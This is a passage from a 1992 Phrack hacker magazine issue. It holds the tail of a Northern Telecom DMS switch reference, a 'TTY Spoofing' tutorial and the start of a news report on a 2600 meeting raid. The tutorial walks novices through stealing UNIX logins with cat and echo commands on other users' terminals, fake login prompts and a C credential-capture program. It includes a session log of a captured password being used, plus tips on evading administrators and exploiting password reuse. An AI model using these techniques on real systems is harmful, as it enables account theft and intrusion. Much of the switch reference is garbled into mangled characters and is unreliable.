  3556.             RSLC - Remote Subscriber Line Module Controller
  3557.             RSLE - Remote Subscriber Line Equipment
  3558.             RSLM - Remote Subscriber Line Module
  3559.             SCM  - Subscriber Carrier Module (DMS-1)
  3560.             SCS  - SCM-10S shelf (SLC-96)
  3561.             SRI  - Subscriber Remote Interface pack
  3562.  
  3563. NTWK        Network
  3564.  
  3565.             ACT  - AC Testing definition
  3566.             D1PK - DS-1 interface pack (SCM-10S)
  3567.             DCM  - Digital Carrier Module
  3568.             1FAC - Interface packs
  3569.             LCM  - Line Concentrating Module
  3570.             LPK  - Line Concentrating Equipment line packs
  3571.             NWPK - Network packs
  3572.             PACK - Peripheral Equipment packs
  3573.             PMS  - Peripheral Maintenance System packs
  3574.             PSHF - Peripheral Equipment Shelf
  3575.             RCT  - Remote Concentrator Terminal
  3576.             REM  - Remote Equipment Module
  3577.             RSHF - Remote Shelf
  3578.             SBLN - Standby line
  3579.             SCM  - Subscriber Carrier Module
  3580.             SCS  - SCM-10S Shelf (SLC-96)
  3581.             SLC  - SLC-96
  3582.             SLPK - SLC-96 Line Packs
  3583.             SRI  - Subscriber Remote Interface (RLCM)
  3584.  
  3585. ODQ         Office Data Query
  3586.  
  3587.             ACDN - Access Directory Number
  3588.             CG   - Carrier group
  3589.             CNTS - Counts
  3590.             DN   - Directory Number
  3591.             DTRK - Digital Trunks (line and trunk)
  3592.             LINE - Lines (line and trunk)
  3593.             PIN  - Personal Identification Number
  3594.             STOR - Memory Storage
  3595.             TG   - Trunk Group
  3596.             TRK  - Trunks (line and trunk)
  3597.  
  3598. QTRN        Query Translations
  3599.  
  3600.             ADDR - Address Translations
  3601.             EBSP - Enhanced Business Services prefix translations
  3602.             ESAP - Emergency Stand-Alone Prefix
  3603.             PRFX - Prefix translations
  3604.             SCRN - Screening translations
  3605.             TRVR - Translation verification
  3606.  
  3607. ROUT        Routes
  3608.  
  3609.             CONN - Nailed-up connections
  3610.             DEST - Destinations
  3611.             POS  - Centralized Automatic Message Accounting positions
  3612.             ROUT - Routes
  3613.             TR   - Toll regions
  3614.  
  3615. SNET        CCS7 Signaling Network
  3616.  
  3617.             SNLS - Signaling Link Set
  3618.             SNL  - Signaling Link
  3619.             SNRS - Signaling Network Route Óeô
  3620. ŠTÇ          Tòuîk Gòoõpó
  3621. Š            IÎC  ­ Énãoíiîg tòuîk gòoõpó
  3622.             ÏÕÔ  ­ Ïõôçïéîç ôòõîë çòïõð󊠠          ²×ÁÙ ­ Ô÷ï­÷áù ôòõîë çòïõðóŠŠÔÈÇР       Ôèïõóáîäó ÇòïõðóŠŠÔÒÁà       Ãáìì Ôòáãéî犊ÔÒË         Ôòõîë󊊠           ÄÔÒË ­ Äéçéôáì Ôòõîë󊠠          ÔÒË  ­ Áîáìïç ïò äéçéôáì òåãïòäåä áîîïõîãåíåîô ôòõîëó
  3623. ŠÔÒÎÓ        Ôòáîóìáôéïî󊊠           ÁÄÄÒ ­ Áääråóó ôòáîóìáôéïîsŠ            ÅÂÓР­ ÅÂÓ ðòåæéø ôòáîóìáôéïî󊠠          ÅÓÁР­ Åíåòçåîãù Óôáîä­Áìïîå ðòåæéøŠ            ÐÒÆØ ­ Ðòåæéø ôòáîóìáôéïî󊠠          ÓÃÒΠ­ Óãòååîéîç ôòáîóìáôéïî󊊊֮ ÓÐÅàÓÈÅÅԊŠÍáøéíõí £ Óõâóãòéâåò Ìéîåóº            ±°¬¸°°Š     ¨éî óôáîä­áìïîå íïä婊
  3624. Íaøiíuí £ Ôrõnësº                       ³,´0¸
  3625.      - Iîcïménç Ôrõnë Çrïuðsº             ±2·
  3626.      - Oõtçoénç Ôrõnë Çrïuðsº             ±2·
  3627.      - Ô÷o­wáy Tòuîk Gòoõpó:              ±2·
  3628.      - Máxémõm Rïuôeóº                    µ1²
  3629.      - Máøémõm Ôòõîëó ðeò Çrïuð:          ²5µ
  3630. ŠDéråcôoòy Nõmâeòsº                     ±6¬0°0Š
  3631. Ïfæiãe Cïdåsº                               ¸
  3632. ŠHïmå Îuíbårénç Ðlán Aòeá:                   4Š
  3633. Ôhïuóaîdó Çrïuðsº                          6´
  3634. ŠNõmâeò ïf Nåt÷oòk Gòoõpó:              ± ïr 2ŠŠÔïôáì Îåô÷ïòë ÃáðáãéôùºŠ    ­ Ïîå Îåô÷ïòë Íïäõì庠              µ¬´°° ÐÏÔÓ ìéîåó « ¶°° ôòõîë󊠠  ­ Ô÷ï Îåô÷ïòë Íïäõì庠             ±°¬¸°° ÐÏÔÓ ìénåó « ±¬²°0 tòõîkó
  3635. ŠÔòáææécŠ     ­ Âõóy Hïuò Ãaìló                 ³¸¬°°0Š     ­ Ávårágå Âusy Såaóon             2¹,°°°
  3636.          Âõóù Èoõò Áôôåíðtó
  3637.      - ÃÃÓ ðår lénå                      µ®±¸ ãåîôé ãáìì óåãïîä󊠠   ­ ÃÃÓ ðåò ôòõîë                     ²·®° ãåîôé ãáìì óåãïîä󊠠   ­ Ôïôáì ÃÃÓ                      ±³³¬°°° ãåîôé ãáìì óåãïîäóŠŠÏõôðõìóéîç                    DÐ, MÆ, oò ÄTÍFŠ
  3638. Éîðuìsénç
  3639.      - Tòuîkó                 ÄP¬ ÍF¬ ïr DÔMÆ
  3640.      - Lines                       DP or ÄTÍF
  3641.  
  3642. Registår Capácétù
  3643.      - Oõtgoéng                  DÐ=±6 dégétó
  3644.                                DÔMF½±¶ dégétó
  3645.                                  MF=14 digits«KÐ+STŠ                            LEAS ÍF½2° äiçiôs+KP+ST
  3646.                              [LEAS Route Access]
  3647.  
  3648.      - Incoming                  DP=14 digits
  3649.                                DTMF=16 digits
  3650.                                  MF=14 digits
  3651.  
  3652.  
  3653. VI. LIMITED GLOSSARY
  3654.  
  3655. DP - Dial Pulse.  A form of signaling thaô ôòáîóíéôó ðõìóå ôòáéîó ôï éîäéãáô加    äéçéôó®  Óìï÷ ãïíðáòåä ôï ÄÔÍÆ áîd ÍÆ®  Íáäå ïâóïìåôå âù ÄÔÍÆ®  Ïì䊠    óôåð­âù­óôåð swéôchåó õóå ôèéó íåthïd¬ áîä therå are ótéìì quitå a æe÷
  3656.      sõâscriber lines that uóå ÄЬ eveî though DTMÆ is availabì宊ŠÉî­âáîä Óéçîáìéîç ­ Ôòáîóíéôôéîç ãïîôòïì óéçîáìó éî ôèå ³°° ­ ³³°° èú öïéã加                   âáî䬠íåáîéîç ôèáô ôèåù§òå áõäéâìå ôï óõâóãòéâåò󮊊Ïõô­ïæ­âáîä Óéçîáìéîç ­ Ôòáîóíéôôéîç ãïîôòïì óéçîáìó áâïöå ïò âåìï÷ ôèå ³°° ­Š                        ³³°° èú öïéce band.  See ÓÓ7, ÃÃÓ7.
  3657.  
  3658. ÄÔMF - Dõáì Ôïîå Mõìôé­Æòåñõåîãù®  A fïòí of én-âáîä óéçîáliîç ôèáô ôòanóíéô󊠠     ô÷ï tïîåó óéíõìtaîåouóìù ôï éîäéãáôå a äéçéô®  Ïîå ôïîå éîäéãáôåó ôè加      òï÷ áîä ôèå ïôèåò éîäéãáôåó á ãïìõíî®  Á æasô¬ ôåãèîéãáììù óéíðìå way of
  3659.        dialing that is in use almost all over the United States.  White boxes
  3660.        generate DTMF tones, a.k.a. "Touch Tones" or Digitones.  See DP, MF.
  3661.  
  3662. MF - Multi-frequency.  A form of in-band signaling similar to DTMF, except the
  3663.      signals are encoded differently (i.e., the row and column tones are
  3664.      different, because the keypad for MF tones isn't laid out in a rectangular
  3665.      matrix).  These are the "operator tones."  Blue boxes generate these
  3666.      tones. See DTMF, In-band signaling.
  3667.  
  3668. CCS7 - Common Channel Signaling 7.  Part of the Signaling System 7
  3669.        specification, CCS7 transmits control signals either above or below the
  3670.        voice band to control switch equipment, so control signals may be
  3671.        transmitted simultaneously with voice.  See SS7.
  3672.  
  3673. SS7 - Signaling System 7.  An inter-switch signaling protocol developed by
  3674.       Bellcore, the RBOCs' research consortium.  Relatively new, this protocol
  3675.       can be run only on digital switches. See CCS7, CLASS.
  3676.  
  3677. CLASS - Custom Local Area Signaling Services.  Several subscriber-line features
  3678.         that are just being introduced around the United States at the time of
  3679.         this article.  See SS7, CCS7.
  3680.  
  3681. Centrex - A scheme that turns a switch into an off-site PBX for business users.
  3682.           It can usually co-exist with existing lines.
  3683.  
  3684.  
  3685. If anyone has any more questions, contact me at WWIVNet THE CAVALIER@3464.
  3686.  
  3687. Thanks to Northern Telecom (the nicest sales staff in the world of switch
  3688. manufacturers, with a killer product to boot!), Pink Flamingo, Taran King,
  3689. Grim, and the crew who supported the NFX in "days of yore."
  3690. _______________________________________________________________________________
  3691.  
  3692.                                 ==Phrack Inc.==
  3693.  
  3694.                    Volume Four, Issue Forty-One, File 8 of 13
  3695.  
  3696.                           ++++++++++++++++++++++++++++
  3697.                     +++++++                          +++++++
  3698.                     +++++++       TTY SPOOFING       +++++++
  3699.                     +++++++                          +++++++
  3700.                      ++++++            BY            ++++++
  3701.                       +++++                          +++++
  3702.                         +++         VaxBuster        +++
  3703.                          ++                          ++
  3704.                           ++++++++++++++++++++++++++++
  3705.  
  3706.                                  July 16, 1992
  3707.  
  3708.  
  3709.      Please note that this file is ONLY to be distributed as part of Phrack, 
  3710. and will NOT be distributed to any other person or magazine for release.
  3711.  
  3712.      More detailed instructions have been provided so that the novice hacker is 
  3713. able to understand them; therefore, all experienced hackers should be able to 
  3714. breeze right through this without having to worry about the specific command 
  3715. syntax provided.
  3716.  
  3717.      On UNIX systems, there are many ways to obtain account names and 
  3718. passwords.  Some hackers prefer to swipe the password file and run programs 
  3719. like Crack and Killer Cracker on them in order to get account names and 
  3720. passwords.  Others rely on bugs or holes in the system in order to gain root 
  3721. access.  Both these methods work, but what do you do if your password file is 
  3722. shadowed (and it is NOT a yellow pages file!)?  And what do you do if all the 
  3723. holes have been patched over from years of previous hackers abusing them? Well, 
  3724. I happen to have found a system where all this is true.  I have even allowed 
  3725. hackers to use one of my accounts to try to gain root privs, and of the 10 or 
  3726. so that have tried, they have all failed.  My only recourse was to find SOME 
  3727. other way to get accounts on the system to maintain MY security.
  3728.  
  3729.      TTY spoofing is often looked at as being lame, and some don't even 
  3730. consider it a "hacking technique."  People usually completely overlook it, and 
  3731. many others don't even know about it, or know HOW to do it.  I suppose I should 
  3732. start out by defining the term.  TTY spoofing is either installing a Trojan 
  3733. horse type program to sit and watch a certain (or multiple) tty and wait for a 
  3734. user to login.  Instead of getting the normal system prompt, the program YOU 
  3735. installed echoes the standard "login:" prompt, and then after they type in 
  3736. their username, it prompts them for "<username> password:" and boom, you have a 
  3737. new account.  This can be done by a program or, in many cases, manually.
  3738.  
  3739.      Of all the people I know, 90 percent of them scream at me saying that this 
  3740. is impossible because their system doesn't allow read/write access to the tty. 
  3741. When I make references to tty, I mean the physical device filename or 
  3742. /dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters 
  3743. (e.g., 03, pa, p4 are all valid).  Of all the systems I've been on, I've never 
  3744. seen one that doesn't allow reading/writing to a LOGIN process.  See, the 
  3745. system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND 
  3746. PASSWORD HAS BEEN VERIFIED.  Console, or ttyco, is an exception where the perms 
  3747. are ALWAYS -rw------.
  3748.  
  3749.      Now that you know WHAT tty spoofing is and the general idea behind WHY it 
  3750. works, I'll start to tell you the many ways it can be done.
  3751.  
  3752.      In order to tty spoof, you MUST have at least ONE valid account on the 
  3753. system.  You can obtain the account via a little social engineering, or you 
  3754. could try a /who *sitename in the IRC to get nicknames and use their username 
  3755. and try to hack out the password.  Try looking for users in #hottub and other 
  3756. st00pid channels because they are the ones who would tend to have the easy 
  3757. passwords.  Or use any other method that you can think of to obtain an account.
  3758.  
  3759.      Once you have an account, the rest is the easy part.  Simply create a 
  3760. script in vi or emacs that redirects input from UNUSED tty's to cat.  Since you 
  3761. are cat's standard output, everything coming FROM the monitored tty will come 
  3762. to your screen.  You probably want to watch about 10 or 15 terminals.  An 
  3763. example script would be: 
  3764. cat </dev/tty01&
  3765. cat </dev/tty02&
  3766. cat </dev/ttypa&
  3767. cat </dev/ttyp1&
  3768.  
  3769.      Then you want to just run your script with source.  Once a user walks up
  3770. to a terminal (or remotely logs in via telnet, etc.), they will try to press 
  3771. return and attempt to get a login prompt.  Many users will also type their
  3772. username, thinking that the system is just waiting for it.  Make sure you write
  3773. down the username.  After a while, they will probably start pressing control
  3774. characters, like control-d or z or whatever.  Here's the problem:  when CAT
  3775. encounters the ^D, it thinks that it is receiving an EOF in the file and it
  3776. thinks its job is done.  You'll get something to the effect of:
  3777.  
  3778. [2] Exit           DONE                        cat </dev/tty01
  3779.  
  3780. or
  3781.  
  3782. [2] Exit 1         cat:i/o error               cat </dev/tty01
  3783.  
  3784. You want to IMMEDIATELY (if not sooner) "recat" that terminal.  Once you get
  3785. that DONE signal, you now know WHAT terminal is active.  You want to then type
  3786. something to the effect of 'echo -n "login:" >/dev/tty01&'.  The & is important
  3787. because if the user decided to switch terminals, echo could lock up and freeze
  3788. your control on the account.  If after about 10 seconds echo doesn't come back
  3789. as:
  3790.  
  3791. [5] Exit            DONE                        echo -n login: >/dev/tty01
  3792.  
  3793. KILL the process.  When you ran the echo command, the shell gave you a
  3794. processid.  Just type KILL processid.  If the done echo line DOES come back,
  3795. that means that it was successfully printed on the user's screen.  He will then
  3796. type in his username.  WRITE THIS DOWN.  If you are ever in doubt that the word
  3797. on your screen is a username, type 'grep word /etc/passwd' and if a line comes
  3798. up, you know it's valid.  If grep doesn't return anything, still keep it
  3799. because it might be a password.  Then wait about 2 seconds, and type
  3800. 'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
  3801. lockage.  If that command doesn't come back in about 10 seconds, kill the
  3802. process off and you can assume that you lost the user (e.g. he moved to another
  3803. terminal).  If the done echo line DOES come back, then in about 2 seconds, you
  3804. SHOULD see his password come up.  If you do, write it down, and boom, you have
  3805. a new account.
  3806.  
  3807.      This may seem like a time consuming process and a lot of work, but
  3808. considering that if you have macros with the "cat </dev/tty" command and the
  3809. echo -n commands preset, it will be a breeze.  Okay - so you say to yourself,
  3810. "I'm a lazy shit, and just want passwords to be handed to me on a silver
  3811. platter."  With a little bit of work, you can do that!  Below is a few lines of
  3812. C source code that can be used to automate this process.  Anyone who knows C
  3813. should be able to put something together in no time.
  3814.  
  3815. #include <stdio.h>
  3816.  
  3817. FILE *fp, *fp2;
  3818. char username[10], password[10];
  3819.  
  3820. main()
  3821. {
  3822.       fp=fopen("/dev/ttyp1", "r");
  3823.       fp2=fopen("/dev/ttyp1", "w");
  3824.  
  3825.       fprintf(fp2, "login:");
  3826.       fscanf(fp, "%s", &username);
  3827.  
  3828.       /* Put delay commands in here */
  3829.  
  3830.       fprintf(fp2, "%s password:", username);
  3831.       fscanf(fp, "%s", @password);
  3832.  
  3833.       printf("Your new account info is %s, with password %s.", username,
  3834.                 password);
  3835. }
  3836.  
  3837.      This is a VERY basic setup.  One could fairly easily have the program take
  3838. arguments from the command line, like a range of tty's, and have the output
  3839. sent to a file.
  3840.  
  3841.      Below is an actual session of manual tty spoofing.  The usernames and
  3842. passwords HAVE been changed because they will probably be active when you read
  3843. this.  Some c/r's and l/f's have been cut to save space.  Please notice the
  3844. time between the startup and getting a new account is only seven minutes.
  3845. Using this technique does not limit the hacked passwords to dictionary
  3846. derivatives like Crack and other programs.
  3847.  
  3848. source mycats                              ; This file contains cats
  3849.                                     ; for terminals tty03 - tty10
  3850. [1] 29377
  3851. /dev/tty03: Permission denied       ; All this means is that someone is logged 
  3852. in
  3853.                                 ; and has their mesg set to NO.  Ignore it.
  3854.  
  3855. [1]    Exit 1               cat < /dev/tty03
  3856. [2] 29378
  3857. [3] 29379
  3858. /dev/tty06: Permission denied
  3859. /dev/tty05: Permission denied
  3860. [4]    Exit 1               cat < /dev/tty06
  3861. [3]    Exit 1               cat < /dev/tty05
  3862. /dev/tty07: Permission denied
  3863. [3]    Exit 1               cat < /dev/tty07
  3864. /dev/tty08: Permission denied
  3865. [3]    Exit 1               cat < /dev/tty08
  3866. [2]  + Stopped (tty input)    cat < /dev/tty04      ;This was the terminal I 
  3867. was
  3868.                                                 ;on - it's automatically
  3869.                                     ;aborted...
  3870. [3] 29383
  3871. <5:34pm><~> /dev/tty09: Permission denied
  3872. [3]    Exit 1               cat < /dev/tty09
  3873. <5:34pm><~> source mycats2                  ;This one contains 34 - 43
  3874.  
  3875. [3] 29393
  3876. [4] 29394
  3877. [5] 29395
  3878. [6] 29396
  3879. [7] 29397
  3880. [8] 29398
  3881. [9] 29399
  3882. /dev/tty36: Permission denied
  3883. /dev/tty37: Permission denied
  3884. /dev/tty38: Permission denied
  3885. /dev/tty39: Permission denied
  3886. /dev/tty40: Permission denied
  3887. /dev/tty34: Permission denied
  3888. /dev/tty35: Permission denied
  3889.  
  3890. [9]    Exit 1               cat < /dev/tty40
  3891. [8]    Exit 1               cat < /dev/tty39
  3892. [7]    Exit 1               cat < /dev/tty38
  3893. [6]    Exit 1               cat < /dev/tty37
  3894. [5]    Exit 1               cat < /dev/tty36
  3895. [4]    Exit 1               cat < /dev/tty35
  3896. [3]    Exit 1               cat < /dev/tty34
  3897.  
  3898. [1] 29400
  3899. [3] 29401
  3900. [4] 29402
  3901.  
  3902. <5:34pm><~> /dev/tty41: Permission denied
  3903.  
  3904. [1]    Exit 1               cat < /dev/tty41
  3905. /dev/tty43: Permission denied
  3906. [4]    Exit 1               cat < /dev/tty43
  3907. /dev/tty42: Permission denied
  3908. [3]    Exit 1               cat < /dev/tty42
  3909.  
  3910. <5:34pm><~> source mycats3                        ;This contains p1-pa
  3911.  
  3912. [3] 29404
  3913. [4] 29405
  3914. [5] 29406
  3915. [6] 29407
  3916. [7] 29408
  3917. /dev/ttyp1: Permission denied
  3918. /dev/ttyp3: Permission denied
  3919. /dev/ttyp5: Permission denied
  3920. /dev/ttyp6: Permission denied
  3921.  
  3922. [8]    Exit 1               cat < /dev/ttyp6
  3923. [7]    Exit 1               cat < /dev/ttyp5
  3924. [5]    Exit 1               cat < /dev/ttyp3
  3925. [3]    Exit 1               cat < /dev/ttyp1
  3926. [7] 29410
  3927. [8] 29411
  3928. [9] 29412
  3929. [1] 29413
  3930.  
  3931. <5:34pm><~> /dev/ttyp7: Permission denied
  3932.  
  3933. [7]    Exit 1               cat < /dev/ttyp7
  3934. /dev/ttypa: Permission denied
  3935. [1]    Exit 1               cat < /dev/ttypa
  3936.  
  3937. <5:34pm><~> source mycats4                         ;Last one is q0-qa
  3938.  
  3939. [1] 29426
  3940. [3] 29427
  3941. [5] 29428
  3942. [7] 29429
  3943. [10] 29430
  3944. [11] 29431
  3945. /dev/ttyq5: Permission denied
  3946.  
  3947. [10]   Exit 1               cat < /dev/ttyq5
  3948. [12] 29432
  3949. [10] 29433
  3950. [13] 29434
  3951. [14] 29435
  3952. <5:34pm><~> who
  3953.  
  3954. <5:34pm><~> nnnnnnnnrlogin unx        ; He thought he didn't type it right.
  3955. pigsnort                                ; Important!  Write down ALL non-
  3956.                               ; system sent messages!
  3957. <5:35pm><~> 
  3958. grep pigsnort /etc/passwd               ; Check with grep to see if it's an
  3959.                               ; account.
  3960.  
  3961. <5:35pm><~>                             ; Didn't return anything - must be a
  3962.                               ; a password!
  3963.  
  3964. nnnpptst8                               ; Sure looks like an account name to
  3965. nnnnn=====                              ; me!  Write it down!
  3966.  
  3967. ls
  3968.  
  3969. [8]    Done                   cat < /dev/ttyp8  ; Asshole pressed control-d.
  3970.                                     ; 'recat' the terminal!
  3971.  
  3972. <5:36pm><~> cat  < /d e v/  ttyp8&             ; This is the 'recat.'
  3973.  
  3974. [8] 29459
  3975. <5:36pm><~> cat: read error: I/O error            ; Asshole is now trying all
  3976.                                     ; sorts of control characters
  3977.                                     ; sending UNIX into a fit.
  3978. [4]    Exit 1               cat < /dev/ttyp2
  3979.  
  3980. <5:36pm><~> cat </dev/ttyp2&                  ; 'recat' it!
  3981.  
  3982. [4] 29465
  3983. <5:36pm><~> 
  3984.  
  3985. <5:36pm><~> 
  3986.  
  3987. [6]    Done                   cat < /dev/ttyp4  ; Someone had to press the
  3988.                                                 ; character, so this is active.
  3989.  
  3990. <5:36pm><~> cat </dev/ttyp4&                  ; 'recat' the ctrl-d.
  3991.  
  3992. [6] 29468
  3993. <5:36pm><~> echo -n "login:" >/dev/ttyble1      ; Try echo'ing a fake login
  3994. cat: read error: I/O error                  ; to the active terminal.
  3995.  
  3996. [6]    Exit 1               cat < /dev/ttyp4
  3997. poop4d                                          ; Here goes another password.
  3998. p4                                              ; Couldn't find the matching
  3999. &                                    ; account.
  4000.  
  4001. [6] 29470
  4002. <5:37pm><~> cat: read error: I/O error
  4003.  
  4004.  
  4005. [4]    Exit 1               cat < /dev/ttyp2
  4006.  
  4007.  
  4008. <5:37pm><~> cat </dev/ttyp2&
  4009.  
  4010. [4] 29489
  4011. <5:37pm><~> echo -n "login:" >/dev/ttyp2&      ; Try echo'ing a fake login
  4012.                                     ; prompt again.
  4013. [15] 29490
  4014. <5:37pm><~> kill 29490                        ; Login prompt didn't return
  4015.                                     ; within a few seconds so we
  4016.                                                 ; kill it.
  4017.  
  4018. [15]   Terminated             echo -n login: > /dev/ttyp2
  4019. <5:37pm><~> cat </dev/tty 
  4020. echo -n "login:" >/dev/ttyp4&
  4021.  
  4022. [15] 29491
  4023. <5:38pm><~> kill 29491
  4024.  
  4025. <5:38pm><~> grep pptst8 /etc/passwd             ; Make sure it's an account!
  4026.  
  4027. pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
  4028. <5:38pm><~> grep ble1 /etc/passwd               ; This isn't an account...
  4029.  
  4030. <5:39pm><~> grep poop4d /etc/passwd             ; Neither is this - probably
  4031.                                     ; a password...
  4032.  
  4033. <5:39pm><~> who                              ; See if any of the users we
  4034.                                     ; caught fell through an
  4035.                                     ; 'uncatted' terminal...
  4036.  
  4037. <5:39pm><~> ps -x                               ; View all our processes.
  4038.                                     ; DAMN glad that the cat's
  4039.   PID TT STAT  TIME COMMAND                     ; don't come up in the process
  4040. 29266 04 S     0:04 -tcsh (tcsh)            ; list!
  4041. 29378 04 T     0:00 cat
  4042. 29412 04 I     0:00 -tcsh (tcsh)
  4043. 29426 04 I     0:00 -tcsh (tcsh)
  4044. 29427 04 I     0:00 -tcsh (tcsh)
  4045. 29428 04 I     0:00 -tcsh (tcsh)
  4046. 29429 04 I     0:00 -tcsh (tcsh)
  4047. 29431 04 I     0:00 -tcsh (tcsh)
  4048. 29432 04 I     0:00 -tcsh (tcsh)
  4049. 29433 04 I     0:00 -tcsh (tcsh)
  4050. 29434 04 I     0:00 -tcsh (tcsh)
  4051. 29435 04 I     0:00 -tcsh (tcsh)
  4052. 29459 04 I     0:00 -tcsh (tcsh)
  4053. 29470 04 D     0:00 <exiting>
  4054. 29489 04 I     0:00 -tcsh (tcsh)
  4055. 29491 04 D     0:00 -tcsh (tcsh)
  4056. 29547 04 R     0:00 ps -x
  4057. <5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29
  4058.  
  4059. 435 29459 29470 29489 289491                    ;Kill off all processes.
  4060.  
  4061. 29470: No such process
  4062.  
  4063. [4]    Terminated             cat < /dev/ttyp2
  4064. [8]    Terminated             cat < /dev/ttyp8
  4065. [14]   Terminated             cat < /dev/ttyqa
  4066. [13]   Terminated             cat < /dev/ttyq9
  4067. [10]   Terminated             cat < /dev/ttyq8
  4068. [12]   Terminated             cat < /dev/ttyq7
  4069. [11]   Terminated             cat < /dev/ttyq6
  4070. [7]    Terminated             cat < /dev/ttyq4
  4071. [5]    Terminated             cat < /dev/ttyq3
  4072. [3]    Terminated             cat < /dev/ttyq2
  4073. [1]    Terminated             cat < /dev/ttyq1
  4074. [9]    Terminated             cat < /dev/ttyp9
  4075. [2]    Terminated             cat < /dev/tty04
  4076.  
  4077. <5:41pm><~> 
  4078.  
  4079. [15]   Terminated             echo -n login: > /dev/ttyp4
  4080. [6]    Done                   echo -n login: > /dev/ttyp4
  4081.  
  4082. <5:41pm><~> ps -x
  4083.  
  4084.   PID TT STAT  TIME COMMAND
  4085. 29266 04 S     0:04 -tcsh (tcsh)
  4086. 29594 04 R     0:00 ps -x
  4087. <5:41pm><~> logout
  4088.  
  4089. Local -011- Session 1 disconnected from UNIX1 
  4090.  
  4091. Local> c unx                                    ; Notice it's a different
  4092.                                                 ; system but shares passwords.
  4093. Local -010- Session 1 to UNX on node MYUNX established
  4094.  
  4095. Welcome to ucuc.edu.
  4096.  
  4097. login: ble1                                     ; Test out all the accounts
  4098. ble1 password:  [I tried poop4d]                ; with all the passwords.
  4099. Login failed.
  4100. login: pptst8
  4101. pptst8 password: [I tried poop4d here too.]
  4102. Login failed.
  4103. login: pptst8
  4104. pptst8 password: [I typed pigsnort]
  4105. Authenticated via AFS Kerberos.                 ; BINGO!  We're in!
  4106. Checking system rights for <pptst8>... login permitted.
  4107. login 1.0(2), Authen
  4108. Last login: Fri Jul 17 17:33:30 on tty11
  4109.  
  4110. (1) unix $ ls                                   ; Let's see what this sucker
  4111.                                                 ; has...hmm...an IRC user, eh?
  4112. Mail      Mailbox      News      bin      irc      other      junk      private      
  4113. public
  4114. (2) unix $ logout
  4115.  
  4116. Local -011- Session 1 disconnected from UNX
  4117.  
  4118.      A few words of advice:  Monitor the tty's when it's the busiest time of 
  4119. the day, usually about 11am on a university system.  Kill all your processes 
  4120. before you hang up.  Those processes that you run will sit on the system and 
  4121. can be found by sysadmins.  Also, they will tie up those tty's that you are 
  4122. monitoring, which can also cause problems.  Point is, you DON'T want to attract 
  4123. attention to what you're doing.  Don't test the accounts you get immediately. 
  4124. If the victim happens to be doing a 'who' and sees two of himself, he is going 
  4125. to shit.  Wait until later or use a different subsystem that won't show up on 
  4126. his 'who'.
  4127.  
  4128. Don't take over accounts.  All the real user has to do is call up the office 
  4129. and tell them that their password was changed.  In two seconds, it'll be 
  4130. changed back, plus the sysadmin will be on the lookout so you're just one step 
  4131. BEHIND where you started.  Once you have someone's account info, kill the cat 
  4132. that is sucking the terminal so that the user can log in normally.  If he 
  4133. continues not to get ANYTHING, he may go and solicit some "professional" help, 
  4134. and THEY might know what's going on, so let the sucker log in.  Another thing:  
  4135. with accounts you get.
  4136.  
  4137. DO NOT DESTROY ANYTHING in the system, not in their account, and no where else 
  4138. if you get higher privs.  Chances are that the person is NOT going to know 
  4139. someone has obtained their password, and will have NO reason to change it.  
  4140. Wait until his college term/semester ends and then monitor the file dates.  If 
  4141. after about a month the dates don't change, change the password and do whatever 
  4142. you want to the account because he's probably done with it.
  4143.  
  4144. Oh and one last thing.  Once you have a valid account, grep the username and 
  4145. get the REAL name.  Then grep the REAL name and find out all accounts on the 
  4146. system that the guy owns.  Chances are that he is using the same password in 
  4147. multiple accounts!
  4148.  
  4149. Thanks go to Pointman, #hack members, and the entire current/past Phrack staff 
  4150. for putting out an excellent magazine over the years.
  4151.  
  4152. If you need to contact me, try the IRC in #hack and the VMB world.  I usually 
  4153. prefer NOT to be contacted by e-mail, but if you have my address and have an 
  4154. important question, go for it.  I'm willing to help any beginners who need it.
  4155.  
  4156. Happy Hacking!
  4157.  
  4158. VaxBuster '92
  4159. _________________________________________________________________________________
  4160.                                 ==Phrack Inc.==
  4161.  
  4162.                   Volume Four, Issue Forty-One, File 11 of 13
  4163.  
  4164.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4165.               PWN                                             PWN
  4166.               PWN              Phrack World News              PWN
  4167.               PWN                                             PWN
  4168.               PWN           Issue 41 / Part 1 of 3            PWN
  4169.               PWN                                             PWN
  4170.               PWN        Compiled by Datastream Cowboy        PWN
  4171.               PWN                                             PWN
  4172.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4173.  
  4174.  
  4175.  Reports of "Raid" on 2600 Washington Meeting                  November 9, 1992
  4176.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4177.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4178.  
  4179. WASHINGTON, D.C. -- The publisher of a well-known hacker magazine claims a
  4180. recent meeting attended by those interested in the issues his magazine raises
  4181. was disrupted by threats of arrest by security and Arlington, Virginia police
  4182. officers.
  4183.  
  4184. Eric Corley, also known as "Emmanuel Goldstein," editor and publisher of "2600
  4185. Magazine: The Hacker Quarterly," told Newsbytes that the meeting was held
  4186. November 6th at the Pentagon City Mall outside Washington, DC was disrupted and
  4187. material was confiscated in the raid.
  4188.  
  4189. 2600 Magazine promotes monthly meetings of hackers, press, and other interested
  4190. parties throughout the country.  The meetings are held in public locations on
  4191. the first Friday evening of the month and the groups often contact each other
  4192. by telephone during the meetings.
  4193.  
  4194. Corley told Newsbytes that meetings were held that evening in New York,
  4195. Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los Angeles and San
  4196. Francisco.  Corley said, "While I am sure that meetings have been observed by
  4197. law enforcement agencies, this is the only time that we have been harassed.  It
  4198. is definitely a freedom of speech issue."
  4199.  
  4200. According to Craig Neidorf, who was present at the meeting and was distributing
  4201. applications for membership in Computer Professionals For Social Responsibility
  4202. (CPSR), "I saw the security officers focusing on us.  Then they started to come
  4203. toward us from a number of directions under what seemed to be the direction of
  4204. a person with a walkie-talkie on a balcony.  When they approached, I left the
  4205. group and observed the security personnel encircling the group of about 30
  4206. gatherers.  The group was mainly composed of high school and college students. 
  4207. The guards demanded to search the knapsacks and bags of the gatherers.  They
  4208. confiscated material, including CPSR applications, a copy of Mondo 2000 (a
  4209. magazine), and other material."
  4210.  
  4211. He adds that the guards also confiscated film "from a person trying to take
  4212. pictures of the guards.  When a hacker called "HackRat" attempted to copy down
